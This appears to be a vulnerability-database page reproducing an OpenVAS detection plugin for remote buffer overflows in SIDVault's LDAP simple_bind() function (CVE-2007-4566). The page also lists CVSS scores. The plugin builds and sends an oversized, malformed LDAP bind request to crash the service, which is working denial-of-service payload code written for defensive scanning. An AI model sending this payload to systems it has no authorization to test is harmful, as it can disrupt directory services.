Lucene search

K
openvasCopyright (C) 2009 Greenbone AGOPENVAS:1361412562310100270
HistorySep 07, 2009 - 12:00 a.m.

SIDVault 'simple_bind()' Function Multiple Remote Buffer Overflow Vulnerabilities

2009-09-0700:00:00
Copyright (C) 2009 Greenbone AG
plugins.openvas.org
10

10 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

7 High

AI Score

Confidence

Low

0.273 Low

EPSS

Percentile

96.8%

SIDVault is prone to multiple remote buffer-overflow vulnerabilities because
the application fails to properly bounds- check user-supplied input before
copying it to an insufficiently sized memory buffer.

# SPDX-FileCopyrightText: 2009 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.100270");
  script_version("2023-07-21T05:05:22+0000");
  script_tag(name:"last_modification", value:"2023-07-21 05:05:22 +0000 (Fri, 21 Jul 2023)");
  script_tag(name:"creation_date", value:"2009-09-07 09:47:24 +0200 (Mon, 07 Sep 2009)");
  script_cve_id("CVE-2007-4566");
  script_tag(name:"cvss_base", value:"10.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_name("SIDVault 'simple_bind()' Function Multiple Remote Buffer Overflow Vulnerabilities");
  script_category(ACT_DENIAL);
  script_family("Buffer overflow");
  script_copyright("Copyright (C) 2009 Greenbone AG");
  script_dependencies("ldap_detect.nasl");
  script_require_ports("Services/ldap", 389, 636);
  script_mandatory_keys("ldap/detected");

  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/25460");
  script_xref(name:"URL", value:"http://www.alphacentauri.co.nz/sidvault/index.htm");
  script_xref(name:"URL", value:"http://www.securityfocus.com/archive/1/477821");

  script_tag(name:"solution", value:"The vendor released SIDVault 2.0f to address this issue. Please see
  the references for more information.");

  script_tag(name:"summary", value:"SIDVault is prone to multiple remote buffer-overflow vulnerabilities because
  the application fails to properly bounds- check user-supplied input before
  copying it to an insufficiently sized memory buffer.");

  script_tag(name:"impact", value:"An attacker can exploit these issues to execute arbitrary code with superuser
  privileges. Successfully exploiting these issues will result in the complete
  compromise of affected computers. Failed exploit attempts will result in a
  denial-of-service condition.");

  script_tag(name:"affected", value:"These issues affect versions prior to SIDVault 2.0f.");

  script_tag(name:"solution_type", value:"VendorFix");
  script_tag(name:"qod_type", value:"remote_analysis");

  exit(0);
}

include("ldap.inc");
include("misc_func.inc");
include("port_service_func.inc");

port = ldap_get_port(default:389);

if(!ldap_alive(port:port))
  exit(0);

soc = open_sock_tcp(port);
if(!soc)
  exit(0);

data = raw_string(0x30, 0x82, 0x11, 0x18, 0x02, 0x01, 0x01, 0x60,
                  0x82, 0x11, 0x11, 0x02, 0x01, 0x03, 0x04, 0x82,
                  0x10, 0x06, 0x64, 0x63, 0x3d);

data += crap(data:"A", length:4099);

data += raw_string(0x80, 0x82, 0x01, 0x00);

data += crap(data:"B", length:256);

data += raw_string(0x30, 0x05, 0x02, 0x01, 0x02, 0x42, 0x00);

send(socket:soc, data:data);
ddata = recv(socket:soc, length:4096);
close(soc);

if(strlen(ddata))
  exit(0); # got an answer. Not dead...

sleep(5);

if(!ldap_alive(port:port)) {
  security_message(port:port);
  exit(0);
}

exit(99);

10 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

7 High

AI Score

Confidence

Low

0.273 Low

EPSS

Percentile

96.8%

Related for OPENVAS:1361412562310100270